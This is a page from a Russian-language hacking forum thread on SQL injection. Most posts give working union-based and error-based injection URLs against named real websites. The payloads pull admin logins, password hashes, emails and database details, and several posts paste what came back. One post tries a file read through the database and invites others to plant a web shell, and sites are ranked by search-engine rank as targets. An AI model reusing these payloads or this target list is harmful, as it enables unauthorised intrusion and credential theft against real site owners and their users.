HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 1483 из 1604 « Первая < 483983138314331473 1479 1480 1481 1482 1483 1484 1485 1486 1487 149315331583 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #14821  
Старый 05.04.2012, 23:28
SS_47
Новичок
Регистрация: 05.04.2012
Сообщений: 18
С нами: 7422806

Репутация: 7
По умолчанию
http://tandem-plus.com.ua/index.php?news=25+and+1=2+union+select+1,login,3,p ass,5,6+from+users--
 
Ответить с цитированием

  #14822  
Старый 06.04.2012, 01:55
Га-Ноцри
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами: 7670486

Репутация: 76
По умолчанию
Так и не побежденный мною сайт.

Как мы видим, File_Priv = Y, но магические кавычки = ON

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.itradeindonesia.com/market_data.php?sub=-1+union+select+load_file(0x433a5c626f6f742e696e69)--[/COLOR][/COLOR] 
Благодаря специфичной реализации сайта, при которой скрипты, составляющие основу юзабилити сайта, как физически присутствуют на сервере в виде отдельных файлов, так и полностью записаны в базу данных, имеется возможность провести sql-инъекцию в сочетании с php-инклудом(я впервые встретил такой наглядный пример, ввиду своего небольшого опыта)

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.itradeindonesia.com/market_data.php?sub=-1+union+select+0x2e2e2f2e2e2f696e646578--[/COLOR][/COLOR] 
Это именно то, о чем вы подумали, залитое через админку, и попавшее в БД. Проинклудить это мне не удалось.

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.itradeindonesia.com/market_data.php?sub=-1+union+select+file_upload+from+ps_daily_stock+limit+60,60--[/COLOR][/COLOR] 
Саму админку, вы без проблем найдете по адресу

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.itradeindonesia.com/admin.php[/COLOR][/COLOR] 
P.S. Сайт является аналогом нашего ололо форекса(онлайн-трейдинг), правил раздела не нарушает, админ поставлен в известность, но пароли от админки как были прежними, так ими и остались, что символизирует. По традиции - если кто-то сможет получить доступ к серверу с помощью веб-шелла, дайте знать. Спасибо. (рад избавиться от этого сайта, стоящего мне бессоные сутки )
 
Ответить с цитированием

  #14823  
Старый 06.04.2012, 13:07
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
С нами: 8836437

Репутация: 136
По умолчанию


http://www.pereslavl.ru/news/world_news.cgi?show_news=-290840%20and%201=2%20union%20select%201,2,concat_w s(char(58),version(),user(),database(),@@version_c ompile_os),4,5,6,7+--

5.0.22-Debian_2-log world_news@localhost world_news pc-linux-gnu
 
Ответить с цитированием

  #14824  
Старый 06.04.2012, 14:41
SS_47
Новичок
Регистрация: 05.04.2012
Сообщений: 18
С нами: 7422806

Репутация: 7
По умолчанию
http://www.six-sigma.ru/index.php?id=140+and+1=2+union+select+1,+2,+3,+con cat(email,':',pass),+5,+6,+7,+8,+9+from+mail
 
Ответить с цитированием

  #14825  
Старый 06.04.2012, 20:01
Га-Ноцри
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами: 7670486

Репутация: 76
По умолчанию
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.telecomsolutions.asia/productdetails.php?pid=-2489+union+select+1,2,3,4,5,6,7,concat_ws(0x03a,AdminId,Username,Password,Email,Status),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96+from+admin_users--[/COLOR][/COLOR] 
 
Ответить с цитированием

  #14826  
Старый 07.04.2012, 00:09
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
С нами: 9318329

Репутация: 394
По умолчанию
Код:
http://www.usu.edu/studemp/offcampus/showdetails.php?jobNum=-4326'+union+select+1,version(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+
Database Version: 5.1.26-rc-community

Database name: employment

User name: studemp@web01.usu.edu
 
Ответить с цитированием

  #14827  
Старый 07.04.2012, 01:11
qaz
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами: 8334326

Репутация: 75


По умолчанию
ozdorov.com

Цитата:
Сообщение от None  
http://www.ozdorov.com/view_news.php?id=76'+or+1+group+by+concat((select+ substr(concat_ws(0x3a,email,password),1,99)+from+b c_forumnsp.phpbb_users+limit+0,1),0x00,floor(rand( 0)*2))having+min(0)+or+1--+
10k users

5.1.49-rel11.3-log

Яндекс тИЦ (CY) 10

Google PageRank (PR)

prestig-tur.com.ua

Цитата:
Сообщение от None  
http://prestig-tur.com.ua/28.html?id=930+limit+0,0+union+select+version%28%2 9,2--+
5.5.20

Яндекс тИЦ (CY) 10

Google PageRank (PR) 2

continenttour.ru

Цитата:
Сообщение от None  
http://www.continenttour.ru/curort.php?id=52%27+or+1+group+by+concat%28%28sele ct+version%28%29%29,0x00,floor%28rand%280%29*2%29% 29having+min%280%29+or+1--+


5.0.26-log

Яндекс тИЦ (CY) 30

Google PageRank (PR) 3

greatsteppe.kz

Цитата:
Сообщение от None  
http://www.greatsteppe.kz/view_post.php?id=21+or+1+group+by+concat%28%28sele ct+substr%28concat_ws%280x3a,user,pass%29,1,99%29+ from+userlist+limit+0,1%29,0x00,floor%28rand%280%2 9*2%29%29having+min%280%29+or+1--+
http://www.greatsteppe.kz/admin/

Яндекс тИЦ (CY) 0

Google PageRank (PR) 1

l-art.ru

Цитата:
Сообщение от None  
http://www.l-art.ru/notes.php?ID=6%27+or+1+group+by+concat%28%28select +version%28%29%29,0x00,floor%28rand%280%29*2%29%29 having+min%280%29+or+1--+
5.0.90-log

Яндекс тИЦ (CY) 10

Google PageRank (PR) 2
 
Ответить с цитированием

  #14828  
Старый 07.04.2012, 03:33
Га-Ноцри
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами: 7670486

Репутация: 76
По умолчанию
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.space-travel.ru/resorts/14?res=-3+union+select+1,2,3,4,5,concat_ws(0x03a,id,login,password,salt,admin),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+ontravel_users+limit+0,1--[/COLOR][/COLOR] 
Админ уведомлен.

P.S. По причине того, что я не смог получить plain их "соленыx" хешей
 
Ответить с цитированием

  #14829  
Старый 09.04.2012, 15:30
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
С нами: 9431076

Репутация: 229
По умолчанию
delinform.ru ТИЦ-230 blind

Код:
delinform.ru/tofirmcard.php?num=1004+and+4=substring(version(),1,1)/*
uaq.org.ua ТИЦ-140

Код:
www.uaq.org.ua/index.php?module=subjects&func=viewpage&pageid=-73+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17--
Код:
4.0.25-standard-log:quality_uaq@hosting3.adamant.net:quality_uaq
farmfresh.org PR-5 Alexa-444k

Код:
http://www.farmfresh.org/about/news_details.php?news=-32+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5--
Код:
5.1.39-log:fresh5farm@comhotspot.com:lgfoods
 
Ответить с цитированием

  #14830  
Старый 09.04.2012, 15:37
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами: 8469890

Репутация: 0
По умолчанию
Тиц 250

PR 2

Цитата:
Сообщение от None  
_http://www.truck.ru/pages.php?page=-6+union+select+1,2,concat_ws(0x3a,version(),user() ,database())--+f
5.0.51b-community-nt-log:truck@localhost:truck
 
Ответить с цитированием
Ответ
Страница 1483 из 1604 « Первая < 483983138314331473 1479 1480 1481 1482 1483 1484 1485 1486 1487 149315331583 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.